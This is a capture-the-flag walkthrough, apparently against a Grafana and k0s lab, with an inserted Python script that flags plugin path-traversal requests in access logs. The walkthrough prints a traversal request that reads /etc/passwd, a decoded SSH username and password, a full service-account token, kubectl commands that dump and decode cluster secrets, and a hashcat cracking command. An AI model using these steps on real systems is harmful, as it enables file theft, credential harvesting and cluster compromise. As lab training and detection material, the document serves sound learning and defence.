Start

public/plugins/alertlist/../../../../../../../../../../etc/passwd

This is a directory traversal attack. Where is Grafana's default configuration file?

/etc/grafana/grafana.ini
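
A detection sketch for the request above, added here as an example (not part of the original write-up): it flags access-log requests under /public/plugins/<id>/ whose path, after percent-decoding, climbs out of the plugin's own directory. The common-log-format layout, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import unquote

# Static-file route for plugins, as used by the request shown above.
PLUGIN_ROUTE = re.compile(r"^/public/plugins/[^/]+/(?P<rest>.*)$")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

def normalize(path, rounds=3):
    """Percent-decode repeatedly so encoded dot segments become literal '..'."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")

def is_plugin_traversal(request_path):
    """True if the path climbs above the plugin's own directory."""
    match = PLUGIN_ROUTE.match(normalize(request_path.split("?", 1)[0]))
    if not match:
        return False
    depth = 0
    for segment in match.group("rest").split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        elif segment not in ("", "."):
            depth += 1
    return False

def scan(log_lines):
    """Return (client, raw_path) for every request that escapes the plugin dir."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m and is_plugin_traversal(m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits

# Constructed access-log lines (common log format), not taken from the page.
SAMPLE = [
    '10.0.0.5 - - [08/Mar/2024:14:20:01 +0000] "GET /public/plugins/alertlist/../../../../../../../../../../etc/passwd HTTP/1.1" 200 1802',
    '10.0.0.5 - - [08/Mar/2024:14:20:09 +0000] "GET /public/plugins/alertlist/%2e%2e/%2e%2e/%2e%2e/etc/grafana/grafana.ini HTTP/1.1" 200 911',
    '10.0.0.9 - - [08/Mar/2024:14:21:30 +0000] "GET /public/plugins/alertlist/img/../module.js HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    print(scan(SAMPLE))
```

A `..` that stays inside the plugin directory (the third sample line) is not reported, which keeps noise down when clients send unnormalized but harmless paths.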

Nothing much in there, so look at main.css.
It contains OZQWO4TBNZ2A====, which Base32-decodes to:
vagrant

My guess is that this is the SSH account.
The password is hereiamatctf907
A bit baffling.

It is a k0s cluster.
k0s kubectl get secret

k0s kubectl describe secret default-token-nhwb5

====
ca.crt: 1103 bytes
namespace: 7 bytes
token: eyJhbGciOiJSUzI1NiIsImtpZCI6IjloanZwZEh2a1pRTlY1Tk1uSHo3RnJnaEt1alE2a2NCNGowOWtNb0ktSE0ifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImRlZmF1bHQtdG9rZW4tbmh3YjUiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoiZGVmYXVsdCIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjEwZDQyNzEyLWJjNzUtNDlmOC1iMjM2LTNkMjFiMDQwNGY4YiIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.jQg6k-JN6KwQbwClB7HCoGFBxUy4ZV1CYbr15uQ7m6rO0edjCtFAzpumdXPO2qOGK5oBHNlhPRtp6LI6TdUlYZyMsNhfuecZiqAFPvnnQxXDrCg-SJPT6ZBNEAMq6a9IRLx_ppeFSNcjUMGE35bnpCaSF31NlzTzswEDHxk3rqrW-WZkVNhyVyxDa8gulilfwziktUknbbs7zwz3I6vjSwL_9pe1_RkLcRAejarF_jyUwgVlehdBrzZADw158AqLr5I61z0b3O1EX051wvmUKqC2WLuY1K_jqsB3kaa9gUYwDK4WByyCnWpX8SEO4iPl9PBQNQyDagjUfcFLWMSRMw

That does not seem to be of much use.

k0s kubectl describe secret k8s.authentication

There is an id attribute; pull it out and take a look:
k0s kubectl get secret k8s.authentication -o jsonpath='{.data.id}'| base64 --decode

Actually, this alone is enough:
k0s kubectl get secret k8s.authentication -o json

Go straight in?
k0s kubectl exec -it kube-api -n kube-system -- /bin/bash

Frustrating, I can't get in.
The database is at /var/lib/k0s/db/state.db
See x1r0z's analysis.

The actual path is /var/lib/k0s/containerd/io.containerd.snapshotter.v1.overlayfs/snapshots/38/fs/home/ubuntu/jokes
Inside this containerd directory, running find . | grep jokes is enough to locate it.

Go into it and run git log --pretty=oneline to view all commits.

Got the flag.

k0s kubectl get job -n internship
k0s kubectl get job -n internship -o json

It echoes a hash value; look it up directly on hashes.

It can also be brute-forced:
hashcat -m 100 -a 0 26c3d1c068e7e01599c3612447410b5e56c779f1 rockyou.txt --show